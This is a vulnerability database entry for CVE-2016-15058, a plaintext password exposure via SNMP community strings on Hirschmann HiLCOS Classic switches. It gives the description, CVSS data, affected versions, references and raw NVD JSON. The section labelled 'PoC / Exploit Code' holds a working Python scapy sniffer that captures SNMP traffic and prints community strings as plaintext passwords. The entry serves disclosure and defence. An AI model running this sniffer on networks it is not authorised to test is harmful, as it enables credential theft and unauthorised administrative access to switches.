CVE-2016-15058

Description

Hirschmann HiLCOS Classic Platform switches Classic L2E, L2P, L3E, L3P versions prior to 09.0.06 and Classic L2B prior to 05.3.07 contain a credential exposure vulnerability where user passwords are synchronized with SNMPv1/v2 community strings and transmitted in plaintext when the feature is enabled. Attackers with local network access can sniff SNMP traffic or extract configuration data to recover plaintext credentials and gain unauthorized administrative access to the switches.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Classic L2E < 09.0.06

Classic L2P < 09.0.06

Classic L3E < 09.0.06

Classic L3P < 09.0.06

Classic L2B < 05.3.07

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2016-15058: SNMP Community String Sniffing
# This script demonstrates how to capture plaintext credentials from SNMP traffic.
# Usage: sudo python3 cve_2016_15058_poc.py

from scapy.all import sniff, SNMP

def packet_callback(packet):
    """Callback to process captured packets."""
    if packet.haslayer(SNMP):
        # Extract the community string which is synced with the user password
        # In this vulnerability, the community string IS the password
        try:
            community = packet[SNMP].community.val.decode('utf-8', errors='ignore')
            print(f"[+] Captured SNMP Packet:")
            print(f"    Source IP: {packet[0][1].src}")
            print(f"    Destination IP: {packet[0][1].dst}")
            print(f"    Community String (Plaintext Password): {community}")
        except Exception as e:
            print(f"Error parsing packet: {e}")

if __name__ == "__main__":
    print("[*] Starting SNMP sniffer for CVE-2016-15058...")
    print("[*] Listening on UDP port 161 (SNMP)...")
    print("[*] Press Ctrl+C to stop.")
    
    # Filter for UDP port 161 (standard SNMP port)
    try:
        sniff(filter="udp port 161", prn=packet_callback, store=0)
    except KeyboardInterrupt:
        print("\n[*] Sniffer stopped.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2016-15058
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2016-15058
[3] CVE Details https://www.cvedetails.com/cve/CVE-2016-15058/
[4] VulDB https://vuldb.com/cve/CVE-2016-15058
[5] https://assets.belden.com/m/1d8273c6205dc400/original/Security-Bulletin-Password-Sync-SNMP-v1-v2-BSECV-2016-12.pdf
[6] https://www.kb.cert.org/vuls/id/507216
[7] https://www.vulncheck.com/advisories/hirschmann-hilcos-classic-platform-password-exposure-via-snmp

Raw JSON Data

JSON

{"cve": {"id": "CVE-2016-15058", "sourceIdentifier": "[email protected]", "published": "2026-04-03T22:16:24.563", "lastModified": "2026-04-07T13:20:55.200", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hirschmann HiLCOS Classic Platform switches Classic L2E, L2P, L3E, L3P versions prior to 09.0.06 and Classic L2B prior to 05.3.07 contain a credential exposure vulnerability where user passwords are synchronized with SNMPv1/v2 community strings and transmitted in plaintext when the feature is enabled. Attackers with local network access can sniff SNMP traffic or extract configuration data to recover plaintext credentials and gain unauthorized administrative access to the switches."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-257"}]}], "references": [{"url": "https://assets.belden.com/m/1d8273c6205dc400/original/Security-Bulletin-Password-Sync-SNMP-v1-v2-BSECV-2016-12.pdf", "source": "[email protected]"}, {"url": "https://www.kb.cert.org/vuls/id/507216", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/hirschmann-hilcos-classic-platform-password-exposure-via-snmp", "source": "[email protected]"}]}}